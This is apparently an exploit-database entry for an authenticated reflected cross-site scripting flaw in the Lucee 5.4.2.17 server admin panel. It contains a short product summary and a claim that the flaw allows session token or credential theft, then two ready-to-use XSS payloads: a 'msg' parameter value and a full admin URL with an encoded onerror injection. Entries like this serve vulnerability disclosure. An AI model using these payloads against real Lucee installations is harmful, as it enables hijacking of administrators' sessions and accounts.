Exploits / Vulnerability Discovered : 2023-08-08 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Lucee 5.4.2.17 authenticated reflected xss is for educational purposes only and if it is used you will do on your own risk!
Summary: Lucee is a light-weight dynamic CFML scripting language with a solid foundation.Lucee is a high performance, open source, ColdFusion / CFML server engine, written in Java.
Description: The attacker can able to convince a victim to visit a malicious URL, can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
The payload: ?msg=<img src=xss onerror=alert('xssya')>
http://172.16.110.130:8888/lucee/admin/server.cfm?action=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E